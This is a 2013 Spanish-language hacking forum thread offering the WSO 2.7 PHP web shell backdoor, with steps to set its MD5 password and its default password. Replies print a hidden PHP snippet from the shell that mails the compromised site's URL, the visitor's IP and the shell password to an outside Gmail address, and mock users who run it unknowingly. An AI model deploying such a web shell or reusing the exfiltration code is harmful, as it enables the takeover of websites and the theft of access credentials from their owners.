comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[PHP] WSO shell backdoor

  • 3 Respuestas
  • 3532 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado craventhegod

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • [C]raven [in]seguridad Informatica
« en: Mayo 12, 2013, 02:46:46 pm »
WSO es una php shell backdoor  que proporciona una interfaz para distintas operaciones remotas,  ahora en su version 2.7 con nuevas herramientas y un vistoso cambio en imagen.



con pass simple                  No tienes permisos para ver links. Registrate o Entra con tu cuenta

pass con error 404                 No tienes permisos para ver links. Registrate o Entra con tu cuenta



importante cambiar la contraseña de la shell***



1. Abriremos nuestra shell en un editor de texto plano (yo les recomiendo notepad)

2. buscaremos

$auth_pass = “1846c8d1ead7d12e9f4d18db001ff079″;

 

lo remplazaremos por nuestra contraseña en MD5 y guardamos

ya que si no quieren cambiar la pass.
 la contraseña por defecto es:

hackmeDON


todo es relativo, hasta nuestra existencia :) Shalom

Desconectado S t Ø r M d ∆ r k

  • *
  • Underc0der
  • Mensajes: 74
  • Actividad:
    0%
  • Reputación 0
  • fb.com/cyberoxyde
    • Ver Perfil
    • Mi Blog
    • Email
  • Twitter: @stormdark_
« Respuesta #1 en: Mayo 12, 2013, 03:05:58 pm »
Hay que enseñarles a ofuscar código a estos juakerz

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("hardwareheaven.com@gmail.com",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);
No tienes permisos para ver links. Registrate o Entra con tu cuenta
In my mind where before there was order, today there is only chaØs!

Desconectado TUNOVATO

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Julio 26, 2013, 11:37:31 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Hay que enseñarles a ofuscar código a estos juakerz

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("hardwareheaven.com@gmail.com",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);

este es un descarado...... ----> hardwareheaven.com@gmail.com

 ;D ;D ;D ;D ;D

Desconectado Psymera

  • *
  • Underc0der
  • Mensajes: 75
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Julio 29, 2013, 10:13:33 am »
eso pasa por ocupar herramientas de otros o lo que es lo mismo ser un simple kiddie xD
El conocimiento es libre...
La información no lo es xD

 

¿Te gustó el post? COMPARTILO!



Fenix Shell (C99 Traducido)

Iniciado por ANTRAX

Respuestas: 13
Vistas: 7748
Último mensaje Mayo 27, 2016, 12:28:12 pm
por blackdrake
Priv Shell Scanner!

Iniciado por Mayk0

Respuestas: 0
Vistas: 2203
Último mensaje Mayo 07, 2013, 08:45:20 pm
por Mayk0
Python Web Shell WSO 0.1 - Undetectable By WAF

Iniciado por sm0ke

Respuestas: 0
Vistas: 1192
Último mensaje Mayo 17, 2018, 01:54:19 am
por sm0ke
[PHP] Worse Linux Shell

Iniciado por ANTRAX

Respuestas: 2
Vistas: 2663
Último mensaje Marzo 26, 2013, 05:40:49 pm
por Xt3mP
Reverse Shell Django

Iniciado por hdbreaker

Respuestas: 0
Vistas: 2693
Último mensaje Octubre 01, 2014, 12:40:08 am
por hdbreaker